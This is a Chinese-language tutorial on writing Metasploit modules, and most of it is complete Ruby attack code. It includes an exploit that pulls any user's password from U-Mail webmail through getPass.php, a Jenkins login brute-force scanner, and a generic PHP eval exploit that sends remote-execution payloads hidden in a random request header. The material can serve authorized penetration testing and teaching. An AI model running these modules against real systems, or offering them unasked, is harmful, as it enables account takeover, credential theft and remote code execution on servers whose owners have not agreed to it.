metasploit 模块编写

1. 编写规范

参考如下:

https://ruby-china.org/wiki/coding-style

2. 示例参考

以乌云上的漏洞来源为例子:http://www.wooyun.org/bugs/wooyun-2010-061894/(用户在写模块时,可自行从网上搜索漏洞)

U-Mail邮件系统权限设置问题导致任意用户密码可越权查看,指定为一个已存在的邮箱账号即可查看任意账户密码。

新建一个新的利用模块umail_pass.rb

cd /opt/metasploit/apps/pro/msf3/modules/exploits
vi umail_pass.rb

示例代码如下:

 #encoding:utf-8
 require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
   include Msf::Exploit::Remote::HttpClient

   def initialize(info={})
     super(update_info(info,
         'Name'           => "U-Mail System Unauthorized Access Vulnerability",
         'Description'    => %q{
             U-Mail邮件系统权限设置问题导致任意用户密码可越权查看,当updata参数的值为s,只需将email参数的值指定为一个已存在的邮箱账号即可查看任意账户密码。
         },
         'License'        => MSF_LICENSE,
         'Author'         =>
           [
           'Rain'    #Metasploit-CNNS
         ],
         'Platform'        => [ 'php' ],
         'Arch'           => ARCH_PHP,
         'Targets'        =>[[ 'U-Mail', { }]],
         'Privileged'     => false,
         'DisclosureDate' => "Apr 11 2011",
         'DefaultTarget'  => 0))
     register_options(
       [
         OptString.new('RHOST', [true, 'The DOMAIN', '']),
         OptString.new('RPORT', [true, 'The port', '80']),
         OptString.new('TARGETURI', [true, 'The base path to U-Mail', '/webmail/']),
         OptString.new('EMAIL', [true, 'The email to U-Mail', '']),
       ], self.class)
   end

   def exploit
     begin
         res = send_request_cgi( {
             'method' => "GET",
             'uri'    => normalize_uri(datastore['TARGETURI']) + "/getPass.php?update=s&email=#{datastore['EMAIL']}"
           }, 20)
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
     rescue ::Timeout::Error, ::Errno::EPIPE
     end
       body_data = res.body.force_encoding('UTF-8')
       if body_data =~ /你的密码是/
         data = body_data.scan(/你的密码是\<\/p\>\<p\>\<center\>\<font color=red\>(.*?)\<\/font\>/)
         if data and data.first and data.first.first
           print_good("---------账号--------\n邮箱 = #{datastore['EMAIL']}, 密码 = #{data.first.first}", "good")
         else
           print_error("漏洞利用失败!")
         end
       else
         print_error("漏洞利用失败!")
       end
   end
 end

辅助模块例子

辅助模块通常为信息探测类,可进行端口、服务等敏感类信息的获取,对于该类模块通常可单独进行使用。

/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/jenkins_login.rb

模块:

 require 'msf/core'
 require 'metasploit/framework/credential_collection'
 require 'metasploit/framework/login_scanner/jenkins'

 class Metasploit3 < Msf::Auxiliary
   include Msf::Auxiliary::Scanner
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::AuthBrute


   def initialize
     super(
       'Name'           => 'Jenkins-CI Login Utility',
       'Description'    => 'This module attempts to login to a Jenkins-CI instance using a specific user/pass.',
       'Author'         => [ 'Nicholas Starke <starke.nicholas[at]gmail.com>' ],
       'License'        => MSF_LICENSE
     )

     register_options(
       [
         OptString.new('LOGIN_URL', [true, 'The URL that handles the login process', '/j_acegi_security_check']),
         OptEnum.new('HTTP_METHOD', [true, 'The HTTP method to use for the login', 'POST', ['GET', 'POST']]),
         Opt::RPORT(8080)
       ], self.class)

     register_autofilter_ports([ 80, 443, 8080, 8081, 8000 ])
     deregister_options('RHOST')
   end

   def run_host(ip)
     cred_collection = Metasploit::Framework::CredentialCollection.new(
       blank_passwords: datastore['BLANK_PASSWORDS'],
       pass_file: datastore['PASS_FILE'],
       password: datastore['PASSWORD'],
       user_file: datastore['USER_FILE'],
       userpass_file: datastore['USERPASS_FILE'],
       username: datastore['USERNAME'],
       user_as_pass: datastore['USER_AS_PASS']
     )

     scanner = Metasploit::Framework::LoginScanner::Jenkins.new(
       configure_http_login_scanner(
         uri: datastore['LOGIN_URL'],
         method: datastore['HTTP_METHOD'],
         cred_details: cred_collection,
         stop_on_success: datastore['STOP_ON_SUCCESS'],
         bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
         connection_timeout: 10
       )
     )

     scanner.scan! do |result|
       credential_data = result.to_h
       credential_data.merge!(
           module_fullname: fullname,
           workspace_id: myworkspace_id
       )
       if result.success?
         credential_core = create_credential(credential_data)
         credential_data[:core] = credential_core
         create_credential_login(credential_data)
         print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}"
       else
         invalidate_login(credential_data)
         vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status})"
       end
     end
   end
 end

利用模块例子

利用模块多为漏洞验证型的,通常用来进行渗透利用,利用成功的通常可获取到具有一定权限的会话,在自动化渗透检测中可被调用,也可单独使用。

/opt/metasploit/apps/pro/msf3/modules/exploits/unix/webapp/php_eval.rb

模块:

 require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ManualRanking
   include Msf::Exploit::Remote::HttpClient
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'Generic PHP Code Evaluation',
       'Description'    => %q{
         Exploits things like <?php eval($_REQUEST['evalme']); ?>
         It is likely that HTTP evasion options will break this exploit.
       },
       'Author'         => [ 'egypt' ],
       'License'        => BSD_LICENSE,
       'References'     => [ ],
       'Privileged'     => false,
       'Platform'       => ['php'],
       'Arch'           => ARCH_PHP,
       'Payload'        =>
         {

           # max header length for Apache,
           # http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize
           'Space'       => 8190,

           # max url length for some old versions of apache according to
           # http://www.boutell.com/newfaq/misc/urllength.html
           #'Space'       => 4000,
           'DisableNops' => true,
           'BadChars'    => %q|'"`|,  # quotes are escaped by PHP's magic_quotes_gpc in a default install
           'Compat'      =>
                                    {
               'ConnectionType' => 'find',
             },
           'Keys'        => ['php'],
         },
       'DisclosureDate' => 'Oct 13 2008',
       'Targets'        => [ ['Automatic', { }], ],
       'DefaultTarget' => 0
       ))
     register_options(
       [
         OptString.new('URIPATH',   [ true,  "The URI to request, with the eval()'d parameter changed to !CODE!", '/test.php?evalme=!CODE!']),
       ], self.class)
   end
   def check
     uri = datastore['PHPURI'].gsub(/\?.*/, "")
     print_status("Checking uri #{uri}")
     response = send_request_raw({ 'uri' => uri})
     if response.code == 200
       return Exploit::CheckCode::Detected
     end
     vprint_error("Server responded with #{response.code}")
     return Exploit::CheckCode::Safe
   end
   def exploit
     # very short timeout because the request may never return if we're
     # sending a socket payload
     timeout = 0.01
     headername = "X-" + Rex::Text.rand_text_alpha_upper(rand(10)+10)
     stub = "error_reporting(0);eval($_SERVER[HTTP_#{headername.gsub("-", "_")}]);"
     uri = datastore['URIPATH'].sub("!CODE!", Rex::Text.uri_encode(stub))
     print_status("Sending request for: http#{ssl ? "s" : ""}://#{rhost}:#{rport}#{uri}")
     print_status("Payload will be in a header called #{headername}")
     response = send_request_raw({
         'global' => true,
         'uri' => uri,
         'headers' => {
             headername => payload.encoded,
             'Connection' => 'close'
           }
       },timeout)
     if response and response.code != 200
       print_error("Server returned non-200 status code (#{response.code})")
     end
     handler
   end
 end

注解
更多模板代码请在https://www.exploit-db.com/search/或其它网站中搜索,也可在本地环境中(/opt/metasploit/apps/pro/msf3/modules/)查看框架自身集成好的模块代码

发表评论

电子邮件地址不会被公开。 必填项已用*标注